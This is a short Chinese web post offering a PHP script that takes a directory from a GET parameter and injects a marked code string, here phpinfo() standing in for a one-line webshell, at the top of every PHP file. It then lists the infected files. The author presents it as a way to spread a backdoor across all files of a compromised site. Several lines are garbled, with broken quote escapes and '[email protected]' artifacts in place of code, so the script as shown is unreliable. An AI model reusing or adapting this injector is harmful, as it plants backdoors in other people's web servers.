作者:xy7[B.C.T]
总是忘记一句话放到哪个文件里去了,直接全部干掉…
<?//xy7
if (!isset($dir) or empty($dir)) {
$dir=str_replace('//','/',dirname(__FILE__));
echo "<font color=/"#00688B/">".$dir."</font>";
} else {
$dir=$_GET['dir'];
echo "<font color=/"#00688B/">".$dir."</font>";
}
$evilcode="<?phpinfo();//xy7?>";
$testdir = opendir($dir);
while($filea = @readdir($testdir)){
if(strstr($filea, '.php')){
$fp = @fopen($filea, 'r+');
if (!strstr(@fread($fp, 20), 'xy7')){
rewind($fp);
$old = @fread($fp, filesize($filea));
rewind($fp);
fwrite($fp, $evilcode . $old);
}
fclose($fp);
}
}
closedir($testdir);
?>
<hr>
<table width="100%" border="0" cellpadding="3" cellspacing="1">
<tr>
<td><b>被X的文件</b></td>
<td><b>时间</b></td>
<td><b>大小</b></td>
</tr>
<?php
[email protected]($dir);
while ([email protected]($dirs)) {
if ((is_file($file)) and (ereg("/.php{0,1}$",$file)))
{$b="$dir/$file";
[email protected]_dir($b);
if($a=="0"){
[email protected]("$dir/$file");
[email protected]("Y-n-d H:i:s",filectime("$dir/$file"));
echo "<tr>/n";
echo "<td>$file</td>/n";
echo " <td>$lastsave</td>/n";
echo " <td>$size Bytes</td>/n";
}
}
}
@closedir($dirs);
?>
</table>
codz by xuanmumu
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论